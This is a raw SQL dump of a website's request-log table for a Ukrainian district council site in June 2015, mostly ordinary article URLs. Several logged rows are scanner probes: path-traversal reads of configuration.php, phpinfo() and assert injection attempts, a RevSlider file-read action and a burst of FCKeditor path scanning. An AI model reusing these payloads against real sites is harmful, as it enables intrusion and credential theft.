00:00:00',301),(14292,'http://www.malyn-rayrada.org.ua/yardim/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-06-06 07:55:13','0000-00-00 00:00:00',301),(14293,'http://www.malyn-rayrada.org.ua/yardim/index.php','','','',1,0,'2015-06-06 07:55:15','0000-00-00 00:00:00',301),(14294,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:----c-------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-06-06 12:05:33','0000-00-00 00:00:00',301),(14295,'http://www.malyn-rayrada.org.ua/images/stories/unel.php?baca','','','',6,0,'2015-06-07 07:56:25','0000-00-00 00:00:00',301),(14296,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=198:------------2006-2010-r&catid=29&Itemid=60&lang=ru','','','',1,0,'2015-06-08 15:51:26','0000-00-00 00:00:00',301),(14297,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=779:2012-10-03-12-34-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-06-08 23:19:13','0000-00-00 00:00:00',301),(14298,'http://malyn-rayrada.org.ua/attachments/312_reiting.pdf','','','',2,0,'2015-06-09 09:40:53','0000-00-00 00:00:00',301),(14299,'http://www.malyn-rayrada.org.ua/phpmyadmin/','','','',1,0,'2015-06-09 18:31:10','0000-00-00 00:00:00',301),(14300,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-&sa=U&ved=0CCEQFjACahUKEwjY4pGv4oTGAhXp_3IKHQ0lAMk&usg=AFQjCNHEV_9IjeitZuENq9tr9CMA6OOJnw','','','',1,0,'2015-06-10 09:03:29','0000-00-00 00:00:00',301),(14301,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--12042013-&sa=U&ved=0CCEQFjACahUKEwjArJ_r54TGAhXJvXIKHYr3AHo&usg=AFQjCNHEV_9IjeitZuENq9tr9CMA6OOJnw','','','',1,0,'2015-06-10 09:27:58','0000-00-00 00:00:00',301),(14302,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=709:2012-06-14-15-04-11&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-10 13:59:11','0000-00-00 00:00:00',301),(14303,'http://malyn-rayrada.org.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php','','http://malyn-rayrada.org.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php','',12,0,'2015-06-10 14:08:03','0000-00-00 00:00:00',301),(14304,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29&id=200:-----------------2006-2010-&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-10 19:19:21','0000-00-00 00:00:00',301),(14305,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=547:-l-r-2011-2016-&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-10 19:19:22','0000-00-00 00:00:00',301),(14306,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45:--14112012-&id=792:2012-10-17-06-26-37&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-10 23:42:08','0000-00-00 00:00:00',301),(14307,'http://malyn-rayrada.org.ua/modules/mod_fxprev/libraries/archives.php','','','',1,0,'2015-06-10 23:43:46','0000-00-00 00:00:00',301),(14308,'http://malyn-rayrada.org.ua/components/com_banners/moderator.php','','','',1,0,'2015-06-11 06:21:01','0000-00-00 00:00:00',301),(14309,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=763:2012-09-24-07-57-43&lang=ru&option=com_content&view=article','','','',4,0,'2015-06-11 13:30:42','0000-00-00 00:00:00',301),(14310,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=792:2012-10-17-06-26-37&catid=45:--14112012-&Itemid=84&lang=uk','','','',2,0,'2015-06-11 18:37:50','0000-00-00 00:00:00',301),(14311,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=1&lang=en&option=com_phocagallery&view=category','','','',3,0,'2015-06-12 11:46:32','0000-00-00 00:00:00',301),(14312,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=748:2012-08-12-17-56-55&catid=11&lang=en&Itemid=','','','',1,0,'2015-06-12 12:37:13','0000-00-00 00:00:00',301),(14313,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-20-05-2015-roku/1100-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-201','',7,0,'2015-06-12 12:38:25','0000-00-00 00:00:00',301),(14314,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1376:2014-08-22-08-01-53&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-13 01:54:49','0000-00-00 00:00:00',301),(14315,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1305:-30----&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-13 10:55:33','0000-00-00 00:00:00',301),(14316,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1318:----3110&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-13 15:27:09','0000-00-00 00:00:00',301),(14317,'http://www.malyn-rayrada.org.ua/index.php?Itemid=7&id=3&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-06-13 18:26:37','0000-00-00 00:00:00',301),(14318,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39:-22022012-&id=547:-l-r-2011-2016-&lang=uk&option=com_content&view=article','','','',4,0,'2015-06-14 01:59:35','0000-00-00 00:00:00',301),(14319,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=448:-2011-2012-&catid=38:--19122011-&Itemid=73&lang=en','','','',2,0,'2015-06-14 15:47:30','0000-00-00 00:00:00',301),(14320,'http://www.malyn-rayrada.org.ua/index.php?Itemid=76&catid=39&id=550:2012-01-26-12-39-51&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-15 05:19:52','0000-00-00 00:00:00',301),(14321,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1254:-1-50&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-15 06:54:32','0000-00-00 00:00:00',301),(14322,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-27-03-2015-roku/1061-pro-zvernennya-do-prem-er-ministra-ukrajini-shch','',16,0,'2015-06-15 12:49:14','0000-00-00 00:00:00',301),(14323,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1329:2014-06-02-11-51-47&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-15 17:23:20','0000-00-00 00:00:00',301),(14324,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&lang=ru&option=com_phocagallery&view=categories','','','',5,0,'2015-06-15 20:32:58','0000-00-00 00:00:00',301),(14325,'http://malyn-rayrada.org.ua/test.php','','','',2,0,'2015-06-15 23:08:36','0000-00-00 00:00:00',301),(14326,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1236:2014-03-07-06-36-44&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-16 00:56:02','0000-00-00 00:00:00',301),(14327,'http://www.malyn-rayrada.org.ua/index.php?Itemid=92&catid=51&id=1030:2013-06-17-06-46-59&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-16 05:35:23','0000-00-00 00:00:00',301),(14328,'http://www.malyn-rayrada.org.ua/blog/','','','',2,0,'2015-06-16 13:29:14','0000-00-00 00:00:00',301),(14329,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1110-pro-zatverdzhennya-rozporyadzhen-golovi-rajonnoj','',4,0,'2015-06-16 15:29:44','0000-00-00 00:00:00',301),(14330,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=311:-v-&catid=33&Itemid=66&lang=ru','','','',2,0,'2015-06-16 21:44:20','0000-00-00 00:00:00',301),(14331,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=755:2012-09-10-12-57-40&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2015-06-18 04:30:40','0000-00-00 00:00:00',301),(14332,'http://malyn-rayrada.org.ua/javascript:void(0);','','','',3,0,'2015-06-18 14:53:49','0000-00-00 00:00:00',301),(14333,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1200:2014-01-31-07-40-52&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-18 16:52:05','0000-00-00 00:00:00',301),(14334,'http://www.malyn-rayrada.org.ua/index.php/1119-zasidannya-vr-ukrajini-18-06-2015-onlajn-translyatsiya','','','',8,0,'2015-06-18 18:02:05','0000-00-00 00:00:00',301),(14335,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1039:---------------l-r&lang=uk&option=com_content&view=article','','','',3,0,'2015-06-18 19:11:56','0000-00-00 00:00:00',301),(14336,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1310:2014-05-06-14-07-43&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-18 19:24:33','0000-00-00 00:00:00',301),(14337,'http://malyn-rayrada.org.ua/language/en-GB/en_GB.php?en=phpinfo();','','','',1,0,'2015-06-18 23:42:06','0000-00-00 00:00:00',301),(14338,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1228:2014-02-27-14-42-41&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-19 02:43:43','0000-00-00 00:00:00',301),(14339,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=748:2012-08-12-17-56-55&lang=en&option=com_content&view=article','','','',3,0,'2015-06-19 06:56:57','0000-00-00 00:00:00',301),(14340,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1161:2013-12-18-13-34-32&lang=uk&option=com_content&view=article','','','',4,0,'2015-06-19 06:56:58','0000-00-00 00:00:00',301),(14341,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-25-02-2015-roku/1022-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-201','',1,0,'2015-06-19 08:32:19','0000-00-00 00:00:00',301),(14342,'http://malyn-rayrada.org.ua/favicon.ico/.php','','','',3,0,'2015-06-19 08:36:09','0000-00-00 00:00:00',301),(14343,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1244:-2014-2018-&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-19 15:49:07','0000-00-00 00:00:00',301),(14344,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1224:----25--2014-&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-19 15:49:08','0000-00-00 00:00:00',301),(14345,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1028:-lr&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-19 17:00:22','0000-00-00 00:00:00',301),(14346,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1252:2014-03-24-17-19-07&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-19 17:12:02','0000-00-00 00:00:00',301),(14347,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1131:9-------&lang=ru&option=com_content&view=article','','','',5,0,'2015-06-19 17:12:04','0000-00-00 00:00:00',301),(14348,'http://www.malyn-rayrada.org.ua/index.php?Itemid=94&catid=53:--25102013-&id=1119:2013-10-25-12-26-37&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-19 18:43:04','0000-00-00 00:00:00',301),(14349,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1373:2014-08-07-11-39-57&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-19 20:19:09','0000-00-00 00:00:00',301),(14350,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=950:2013-03-06-13-10-57&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-19 21:53:42','0000-00-00 00:00:00',301),(14351,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=949:2013-03-06-12-51-36&lang=ru&option=com_content&view=article','','','',5,0,'2015-06-19 21:53:47','0000-00-00 00:00:00',301),(14352,'http://www.malyn-rayrada.org.ua/index.php?Itemid=32&id=4&lang=uk&option=com_phocagallery&view=category','','','',2,0,'2015-06-19 21:53:47','0000-00-00 00:00:00',301),(14353,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1008:2013-05-20-07-02-57&lang=uk&option=com_content&view=article','','','',3,0,'2015-06-19 22:58:24','0000-00-00 00:00:00',301),(14354,'http://malyn-rayrada.org.ua/libraries/cms/application/administrator.php?param1=assert&param2=phpinfo();','','','',1,0,'2015-06-19 23:17:27','0000-00-00 00:00:00',301),(14355,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=437:-----l-r--2012-2015-&catid=37&Itemid=72&lang=ru','','','',1,0,'2015-06-20 02:03:48','0000-00-00 00:00:00',301),(14356,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1151:2013-11-28-14-54-33&lang=ru&option=com_content&view=article','','','',3,0,'2015-06-20 02:04:54','0000-00-00 00:00:00',301),(14357,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=708:-l-r&catid=43&Itemid=82&lang=uk','','','',5,0,'2015-06-20 02:10:45','0000-00-00 00:00:00',301),(14358,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1028:-lr&lang=en&option=com_content&view=article','','','',4,0,'2015-06-20 02:15:40','0000-00-00 00:00:00',301),(14359,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1368:2014-07-17-04-39-11&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-20 02:15:43','0000-00-00 00:00:00',301),(14360,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56:--03022014-&id=1199:-l-r-&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-20 03:32:57','0000-00-00 00:00:00',301),(14361,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46&id=851:-2013-&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-20 08:57:31','0000-00-00 00:00:00',301),(14362,'http://www.malyn-rayrada.org.ua/index.php?Itemid=62&catid=31:-25032011&id=276:---4-----6--25032011-&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-20 09:37:42','0000-00-00 00:00:00',301),(14363,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1011:2013-05-29-09-51-28&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-20 11:07:11','0000-00-00 00:00:00',301),(14364,'http://malyn-rayrada.org.ua/components/com_wrapper/wraper.php?en=phpinfo();','','','',1,0,'2015-06-20 12:39:14','0000-00-00 00:00:00',301),(14365,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=709:2012-06-14-15-04-11&lang=uk&option=com_content&view=article','','','',3,0,'2015-06-20 12:40:16','0000-00-00 00:00:00',301),(14366,'http://malyn-rayrada.org.ua/libraries/phputf8/phputf8.php?en=phpinfo();','','','',1,0,'2015-06-20 12:51:37','0000-00-00 00:00:00',301),(14367,'http://malyn-rayrada.org.ua/modules/mod_archive/tmpl/index.php?en=phpinfo();','','','',1,0,'2015-06-20 13:14:55','0000-00-00 00:00:00',301),(14368,'http://malyn-rayrada.org.ua/modules/mod_footer/tmpl/index.php?en=phpinfo();','','','',1,0,'2015-06-20 19:13:08','0000-00-00 00:00:00',301),(14369,'http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',4,0,'2015-06-21 23:24:33','0000-00-00 00:00:00',301),(14370,'http://malyn-rayrada.org.ua/docs/wp-admin/admin-ajax.php','','','',1,0,'2015-06-21 23:24:44','0000-00-00 00:00:00',301),(14371,'http://malyn-rayrada.org.ua/docs/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-06-21 23:24:46','0000-00-00 00:00:00',301),(14372,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1019:2013-06-06-11-26-38&catid=36&Itemid=70&lang=uk','','','',1,0,'2015-06-22 03:58:38','0000-00-00 00:00:00',301),(14373,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1114-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',7,0,'2015-06-22 06:14:30','0000-00-00 00:00:00',301),(14374,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1114-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-22 06:14:33','0000-00-00 00:00:00',301),(14375,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1114-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik','','','',1,0,'2015-06-22 07:34:30','0000-00-00 00:00:00',301),(14376,'http://www.malyn-rayrada.org.ua/index.php?Itemid=60&catid=29:--15122010-&id=198:------------2006-2010-r&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-22 08:28:32','0000-00-00 00:00:00',301),(14377,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-16-06-2015-roku/1114-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-22 13:06:36','0000-00-00 00:00:00',301),(14378,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1290:2014-04-23-06-56-41&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-22 13:14:15','0000-00-00 00:00:00',301),(14379,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33:-20052011&id=313:-2011-2015-&lang=uk&option=com_content&view=article','','','',4,0,'2015-06-23 16:28:51','0000-00-00 00:00:00',301),(14380,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=922:2013-02-11-10-53-17&catid=11&lang=ru&Itemid=','','','',1,0,'2015-06-23 23:24:19','0000-00-00 00:00:00',301),(14381,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=en&Itemid=0','','','',1,0,'2015-06-23 23:36:52','0000-00-00 00:00:00',301),(14382,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=ru&Itemid=0','','','',1,0,'2015-06-23 23:36:58','0000-00-00 00:00:00',301),(14383,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1161:2013-12-18-13-34-32&catid=11&lang=uk&Itemid=0','','','',1,0,'2015-06-23 23:37:00','0000-00-00 00:00:00',301),(14384,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37&id=409:-2011-&lang=ru&option=com_content&view=article','','','',1,0,'2015-06-24 08:09:14','0000-00-00 00:00:00',301),(14385,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=765:-qq&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-24 08:09:16','0000-00-00 00:00:00',301),(14386,'http://www.malyn-rayrada.org.ua/index.php?Itemid=73&catid=38&id=482:-2012-2015-&lang=uk&option=com_content&view=article','','','',1,0,'2015-06-24 13:37:09','0000-00-00 00:00:00',301),(14387,'http://www.malyn-rayrada.org.ua/index.php?Itemid=10&id=1&lang=uk&layout=blog&option=com_content&view=category','','','',5,0,'2015-06-25 01:06:54','0000-00-00 00:00:00',301),(14388,'http://www.malyn-rayrada.org.ua/index.php?option=com_macgallery&view=download&albumid=../../configuration.php','','','',1,0,'2015-06-25 08:06:37','0000-00-00 00:00:00',301),(14389,'http://www.malyn-rayrada.org.ua/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php','','','',1,0,'2015-06-25 19:48:16','0000-00-00 00:00:00',301),(14390,'http://www.malyn-rayrada.org.ua/www.gismeteo.ua/ua','','','',18,0,'2015-06-25 22:42:24','0000-00-00 00:00:00',301),(14391,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=714:2012-06-14-15-15-43&lang=uk&option=com_content&view=article','','','',6,0,'2015-06-26 10:56:07','0000-00-00 00:00:00',301),(14392,'http://www.malyn-rayrada.org.ua/dekra/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:17:50','0000-00-00 00:00:00',301),(14393,'http://www.malyn-rayrada.org.ua/c4sql8-solidarieta/html/images_sys/fckeditor.o/editor/fckeditor.html','','','',1,0,'2015-06-26 13:17:53','0000-00-00 00:00:00',301),(14394,'http://www.malyn-rayrada.org.ua/adminicpsb/script/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:17:55','0000-00-00 00:00:00',301),(14395,'http://www.malyn-rayrada.org.ua/gbe/modules/content/admin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:17:58','0000-00-00 00:00:00',301),(14396,'http://www.malyn-rayrada.org.ua/blog/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:00','0000-00-00 00:00:00',301),(14397,'http://www.malyn-rayrada.org.ua/webmanager/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:03','0000-00-00 00:00:00',301),(14398,'http://www.malyn-rayrada.org.ua/controls/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:05','0000-00-00 00:00:00',301),(14399,'http://www.malyn-rayrada.org.ua/crm/include/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:07','0000-00-00 00:00:00',301),(14400,'http://www.malyn-rayrada.org.ua/sites/efeefe.no-ip.org/modules_bak/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:09','0000-00-00 00:00:00',301),(14401,'http://www.malyn-rayrada.org.ua/kmustkjc/plugins/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:12','0000-00-00 00:00:00',301),(14402,'http://www.malyn-rayrada.org.ua/newsite/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:14','0000-00-00 00:00:00',301),(14403,'http://www.malyn-rayrada.org.ua/sites/all/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:16','0000-00-00 00:00:00',301),(14404,'http://www.malyn-rayrada.org.ua/system/lib/ext/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:19','0000-00-00 00:00:00',301),(14405,'http://www.malyn-rayrada.org.ua/portfolio/aui/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:21','0000-00-00 00:00:00',301),(14406,'http://www.malyn-rayrada.org.ua/site/lib/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:23','0000-00-00 00:00:00',301),(14407,'http://www.malyn-rayrada.org.ua/joshiken/html/mambots/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:25','0000-00-00 00:00:00',301),(14408,'http://www.malyn-rayrada.org.ua/~documents/CMGA6/registration/public/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:28','0000-00-00 00:00:00',301),(14409,'http://www.malyn-rayrada.org.ua/javascript/editors/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:30','0000-00-00 00:00:00',301),(14410,'http://www.malyn-rayrada.org.ua/html/editor/wp-content/plugins/fckeditor_for_wordpress/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:32','0000-00-00 00:00:00',301),(14411,'http://www.malyn-rayrada.org.ua/cf/scripts/ajax/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:35','0000-00-00 00:00:00',301),(14412,'http://www.malyn-rayrada.org.ua/UI/Tools/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:37','0000-00-00 00:00:00',301),(14413,'http://www.malyn-rayrada.org.ua/adm_gerencia/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:39','0000-00-00 00:00:00',301),(14414,'http://www.malyn-rayrada.org.ua/stara/include/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:41','0000-00-00 00:00:00',301),(14415,'http://www.malyn-rayrada.org.ua/~pi/opiti/pppblog/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:43','0000-00-00 00:00:00',301),(14416,'http://www.malyn-rayrada.org.ua/user_data/packages/miyabunnew/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:45','0000-00-00 00:00:00',301),(14417,'http://www.malyn-rayrada.org.ua/common/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:56','0000-00-00 00:00:00',301),(14418,'http://www.malyn-rayrada.org.ua/libs/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:18:58','0000-00-00 00:00:00',301),(14419,'http://www.malyn-rayrada.org.ua/webmail/plugins/html_mail/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:01','0000-00-00 00:00:00',301),(14420,'http://www.malyn-rayrada.org.ua/jeunes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:03','0000-00-00 00:00:00',301),(14421,'http://www.malyn-rayrada.org.ua/wysiwyg/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:05','0000-00-00 00:00:00',301),(14422,'http://www.malyn-rayrada.org.ua/drupal/sites/all/modules/fckeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:08','0000-00-00 00:00:00',301),(14423,'http://www.malyn-rayrada.org.ua/admin/libexterne/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:10','0000-00-00 00:00:00',301),(14424,'http://www.malyn-rayrada.org.ua/inc/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:12','0000-00-00 00:00:00',301),(14425,'http://www.malyn-rayrada.org.ua/cms/_includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:14','0000-00-00 00:00:00',301),(14426,'http://www.malyn-rayrada.org.ua/frame/lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:17','0000-00-00 00:00:00',301),(14427,'http://www.malyn-rayrada.org.ua/mt/mt-static/plugins/FCKeditor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:19','0000-00-00 00:00:00',301),(14428,'http://www.malyn-rayrada.org.ua/GestaoProService/includes/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:21','0000-00-00 00:00:00',301),(14429,'http://www.malyn-rayrada.org.ua/blog/wp-content/plugins/fckeditor-for-wordpress-plugin/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:23','0000-00-00 00:00:00',301),(14430,'http://www.malyn-rayrada.org.ua/ccmail/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:26','0000-00-00 00:00:00',301),(14431,'http://www.malyn-rayrada.org.ua/web-files/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:28','0000-00-00 00:00:00',301),(14432,'http://www.malyn-rayrada.org.ua/pliki/adm/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:30','0000-00-00 00:00:00',301),(14433,'http://www.malyn-rayrada.org.ua/js/3rdparty/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:32','0000-00-00 00:00:00',301),(14434,'http://www.malyn-rayrada.org.ua/glossary/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:34','0000-00-00 00:00:00',301),(14435,'http://www.malyn-rayrada.org.ua/module/00023/59/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:37','0000-00-00 00:00:00',301),(14436,'http://www.malyn-rayrada.org.ua/codemis_cms/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:39','0000-00-00 00:00:00',301),(14437,'http://www.malyn-rayrada.org.ua/shop/assets/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:41','0000-00-00 00:00:00',301),(14438,'http://www.malyn-rayrada.org.ua/customcontent/USDA_ECM_OVERVIEW/cvx06_sco01/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:43','0000-00-00 00:00:00',301),(14439,'http://www.malyn-rayrada.org.ua/plugins/fckeditor-spip-2/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:45','0000-00-00 